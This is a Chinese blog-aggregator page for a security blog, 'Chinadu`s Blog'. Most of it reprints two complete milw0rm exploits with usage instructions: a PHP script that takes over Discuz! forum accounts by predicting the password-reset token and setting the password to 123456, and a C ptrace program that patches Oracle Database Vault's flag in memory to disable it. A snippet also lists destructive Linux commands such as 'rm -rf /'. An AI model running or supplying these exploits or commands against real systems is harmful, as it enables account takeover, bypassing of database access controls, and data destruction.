博客榜—查看频道“Chinadu`s Blog”

总排名： 165239

Chinadu`s Blog

关注网络安全

作者：chinadu
RSS地址： http://www.4shell.org/rss.xml
共有68篇文章被收藏推荐

鲜果类别： IT.科技

鲜果标签：黑客 exploit 网络安全漏洞

chinadu 的频道收录于2008-10-10

报错

最新文章

精华文章

2位订阅者

还没有评论

▶ Discuz! Remote Reset User Password Exploit 2008-11-24 01:31

#!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Discuz! Reset User Password Exploit by 80vul team: http://www.80vul.com +---------------------------------------------------------------------------+ '); if ($argc < 6) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user mail uid host: target server (ip/hostname) path: path to discuz user: user login name mail: user login mail uid: user login id Example: php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2 +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $mail = $argv[4]; $uid = $argv[5]; $fp = fsockopen($host, 80); $data = "GET ".$path."viewthread.php HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Keep-Alive: 300\r\n"; $data .= "Connection: keep-alive\r\n\r\n"; fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) { $resp .= fread($fp, 1024); preg_match('/&formhash=([a-z0-9]{8})/', $resp, $hash); if ($hash) break; } if ($hash) { $cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lostpwsubmit=true&formhash='.$hash[1]; $data = "POST ".$path."member.php HTTP/1.1\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n"; $data .= "Connection: close\r\n\r\n"; $data .= $cmd; fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); fclose($fp); preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid); if (!$sid) exit("Exploit Failed!\n"); $seed = getseed(); if ($seed) { mt_srand($seed); random(); mt_rand(); $id = random(); $fp = fsockopen($host, 80); $cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash='.$hash[1]; $data = "POST ".$path."member.php HTTP/1.1\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n"; $data .= "Connection: close\r\n\r\n"; $data .= $cmd; fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); if (strpos($resp, '您的密码已重新设置，请使用新密码登录。') !== false) exit("Expoilt Success!\nUser New Password:\t123456\n"); else exit("Exploit Failed!\n"); } else exit("Exploit Failed!\n"); } else exit("Exploit Failed!\n"); function getseed() { global $sid; for ($seed = 0; $seed <= 1000000; $seed ++) { mt_srand($seed); $id = random(6); if ($id == $sid[1]) return $seed; } return false; } function random($length = 6) { $hash = ''; $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; $max = strlen($chars) - 1; for ($i = 0; $i < $length; $i ++) $hash .= $chars[mt_rand(0, $max)]; return $hash; } ?> # milw0rm.com [2008-11-22]

继续阅读《Discuz! Remote Reset User Password Exploit》的全文内容...

Oracle Database Vault ptrace(2) Privilege Escalation Exploit (2008-11-21 14:58:45)

PHP 5.2.6 (error_log) safe_mode Bypass Vulnerability (2008-11-21 14:55:57)

VideoScript <_ _4.0.1.50="_4.0.1.50" admin="admin" change="change" password="password" exploit="exploit" a="a"> (2008-11-19 13:10:57)

No-IP DUC <_ _2.1.7="_2.1.7" remote="remote" code="code" execution="execution" exploit="exploit" a="a"> (2008-11-19 13:3:28)

Opera 9.62 file:// Local Heap Overflow Exploit (2008-11-18 8:46:13)

▶ windows系统目录环境变量大全(目录简写) 2008-11-24 01:31

编程用的到：%ALLUSERSPROFILE% C:\Documents and Settings\All Users%USERPROFILE% C:\Documents and Settings\当前用户名%HOMEPATH% C:\Documents and Settings\当前用户名%SYSTEMROOT% C:\WINDOWS%WINDIR% C:\WINDOWS%ComSpec% ...

▶ 7条秒杀Linux的命令 2008-11-24 01:31

如果您使用Linux,可千万要记得不要让傻孩子们敲入以下命令,尽管这些命令看上去相当复杂,但还是会对你的系统造成严重影响.有一些会影响你的程序和系统运行,有一些会直接把你的盘抹掉,这些命令几乎没有什么可以挽回的余地.1. Code:rm -rf /这个很简单,根目录会被擦光.2. Code:char esp[] __attribute__...

▶ 把实况足球玩成了一种艺术 2008-11-21 17:12

▶ Oracle Database Vault ptrace(2) Privilege Escalation Exploit 2008-11-21 17:12

/* * original release: http://vnull.pcnet.com.pl/blog/?p=92 * * ora_dv_mem_off.c version 0x1 * ORACLE Database Vault runtime disabler (x86_32 Linux only) * AKA give_back_the_freedom * by Jakub 'vnull' Wartak <jakub.wartak@gmail.com> 26.02.2008 * 0-day PRIVATE! D0 N0T DI$TRIBUT3! * * Tested on 10.2.0.3, CentOS 5. * For other architectures/OS combos consider having fun with gdb ;] * * Whole Database Vault architecture is flawed if DBA has access to * oracle user process space. IMHO you could limit risk by creating * UNIX accounts for DBAs with membership of OSDBA group (along with * oracle SUID binary and shared memory with only read permission * for OSDBA group [check SHM privs: ipcs -cm] ). But how those DBAs * would cope with some serious crashes (requiring for e.g. restoring * controlfile) ? * * Usage: * Set enviorniment variables: ORACLE_BASE, ORACLE_SID, ORACLE_HOME * $ gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty * $ ./ora_dv_mem_off * * REQUIEREMENTS: * + run as oracle process owner (by default "oracle") * + working ptrace(), it won't work in systems with ptrace() * disabled (grsecurity and some LKMs). * + BFD headers and library (binutils-devel) * * THE DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. THE * CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE * LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES, * LOSSES OR UNLAWFUL OFFENCES. * * USE AT OWN RISK! * */ #include <bfd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sys/types.h> #include <sys/ptrace.h> #include <sys/wait.h> #include <linux/user.h> #include <linux/ptrace.h> #include <asm/unistd.h> /* for __NR_clone */ /* you may need to alter this */ #define ORABASE "/u01/app/oracle/product/10.2.0/bin" /* * Magic... (at&t syntax) * push %ebp * mov %esp, %ebp * mov <DV_FLAG>, %eax * [..] * where DV_FLAG is 32-bit long */ #define ASM_DV_FUNC_PROLOG "\x55\x8b\xec\xb8" const char *sqlplus = ORABASE "/sqlplus"; const char *oracle = ORABASE "/oracle"; const int long_size = sizeof(long); pid_t child; long locate_dv_func(void) { asymbol **symbol_table; bfd *b = bfd_openr(oracle, NULL); if (b == NULL) { perror("bfd_openr"); exit(-1); } bfd_check_format(b, bfd_object); long storage_needed = bfd_get_symtab_upper_bound(b); if(storage_needed < 0) { fprintf(stderr, "wtf?!\n"); exit(-1); } if((symbol_table = (asymbol**)malloc(storage_needed)) == 0) { perror("malloc"); exit(-1); } int num_symbols; if((num_symbols = bfd_canonicalize_symtab(b, symbol_table)) <= 0) { fprintf(stderr, "no symbols info\n"); exit(-1); } int i; for(i = 0; i < num_symbols; i++) { char *symname = bfd_asymbol_name(symbol_table[i]); void *symaddr = bfd_asymbol_value(symbol_table[i]); /* don't even ask why this funciton, for real hardcore: gdb -p <oraclePIDs> */ if(!strcmp(symname, "kzvtins")) { fprintf(stderr, "[%d] symbol \"kzvtins\" at 0x%lx\n", getpid(), (long) symaddr); return (long) symaddr; } } return 0; } /* from "Playing with ptrace(), part#2, Linux Journal, author: Pradeep Padala */ void getdata(pid_t child, long addr, char *str, int len) { char *laddr; int i, j; union u { long val; char chars[long_size]; } data; i = 0; j = len / long_size; laddr = str; while(i < j) { data.val = ptrace(PTRACE_PEEKDATA, child, addr + i * 4, NULL); memcpy(laddr, data.chars, long_size); ++i; laddr += long_size; } j = len % long_size; if(j != 0) { data.val = ptrace(PTRACE_PEEKDATA,child, addr + i * 4,NULL); memcpy(laddr, data.chars, j); } str[len] = '\0'; } void putdata(pid_t child, long addr, char *str, int len) { char *laddr; int i, j; union u { long val; char chars[long_size]; } data; i = 0; j = len / long_size; laddr = str; while(i < j) { memcpy(data.chars, laddr, long_size); ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); ++i; laddr += long_size; } j = len % long_size; if(j != 0) { memcpy(data.chars, laddr, j); ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); } } void cleanup(void) { int s; kill(child, SIGKILL); wait(&s); } int main(int ac, char **av) { int status; pid_t orapid = 0; bfd_init(); if((child = fork()) == -1) { perror("fork"); exit(-1); } if(child == 0) { if(ptrace(PTRACE_TRACEME, 0, NULL, NULL)==-1) { perror("unable to ptrace(PTRACE_TRACEME)"); exit(-1); } /* launch sqlplus */ if(execl(sqlplus, "sqlplus", "/nolog", NULL)==-1) { perror("execl"); exit(-1); } /* not reached */ exit(0); } if(atexit(cleanup) != 0) { fprintf(stderr, "[%d] unable to register cleanup function\n", getpid()); } wait(&status); if(WIFSTOPPED(status)) { fprintf(stderr, "[%d] starting to trace sqlplus process (%d)\n", getpid(), child); } fprintf(stderr, "[***] NOW TYPE IN SQLPLUS: conn / as sysdba\n"); while(!orapid) { struct user_regs_struct uregs; ptrace(PTRACE_SYSCALL, child, 0, 0); wait(&status); ptrace(PTRACE_GETREGS, child, 0, &uregs); /* ouch! no fork()? clone()! */ if(uregs.orig_eax==__NR_clone) { long *regs = 0; /* fprintf(stderr, "[%d] clone() syscall\n", getpid()); */ ptrace(PTRACE_SYSCALL, child, 0, 0); wait(&status); if((orapid = ptrace(PTRACE_PEEKUSER, child, &regs[EAX], 0)) == -1) { perror("ptrace(PTRACE_PEEKUSER): unable to get clone() retvalue\n"); exit(-1); } fprintf(stderr, "[%d] clone() syscall in %d, tracing orapid=%d\n", getpid(), child, orapid); /* attach to orapid, detach from sqlplus */ if(ptrace(PTRACE_ATTACH, orapid, 0, 0) == -1) { perror("ptrace(PTRACE_ATTACH) to orapid"); exit(-1); } while(1) { ptrace(PTRACE_SYSCALL, orapid, 0, 0); wait(&status); ptrace(PTRACE_GETREGS, orapid, 0, &uregs); if(uregs.orig_eax==__NR_execve) { fprintf(stderr, "[%d] execve() syscall in %d, \n", getpid(), orapid); /* end ptrace of syscall */ ptrace(PTRACE_SYSCALL, orapid, 0, 0); break; } else { //fprintf(stderr, "got %ld\n", uregs.orig_eax); ptrace(PTRACE_SYSCALL, orapid, 0, 0); } } if(ptrace(PTRACE_DETACH, child, 0, 0) == -1) { perror("ptrace(PTRACE_DETACH) from child"); exit(-1); } } else if(uregs.orig_eax==__NR_execve) { fprintf(stderr, "[%d] execve() syscall in %d\n", getpid(), child); } } /* now we have oracle server process under our control :) */ long dv_func = locate_dv_func(); if(dv_func == 0) { fprintf(stderr, "ERROR: unable to find function\n"); exit(-1); } wait(&status); unsigned char buf[32]; memset(buf, 0, sizeof(buf)); getdata(orapid, dv_func, (char *)&buf, 32); /* dump opcodes */ /* for(i = 0; i < 31; i++) { fprintf(stderr, "%x ", (unsigned char)buf[i]); } */ if(!memcmp(buf, ASM_DV_FUNC_PROLOG, strlen(ASM_DV_FUNC_PROLOG))) { unsigned char dv_status; unsigned long woff = dv_func + strlen(ASM_DV_FUNC_PROLOG), woff2=woff; getdata(orapid, woff, (char *)&dv_status, 1); fprintf(stderr, "[***] sucessfuly validated function, DatabaseVault=%d\n", dv_status); fprintf(stderr, "[***] attempting to rewrite memory at 0x%lx\n", woff2); unsigned char my = 0; putdata(orapid, woff2, (void *)&my, 1); } if(ptrace(PTRACE_DETACH, orapid, 0, 0) == -1) { perror("ptrace(PTRACE_DETACH) from orapid"); exit(-1); } wait(&status); exit(0); } // milw0rm.com [2008-11-20]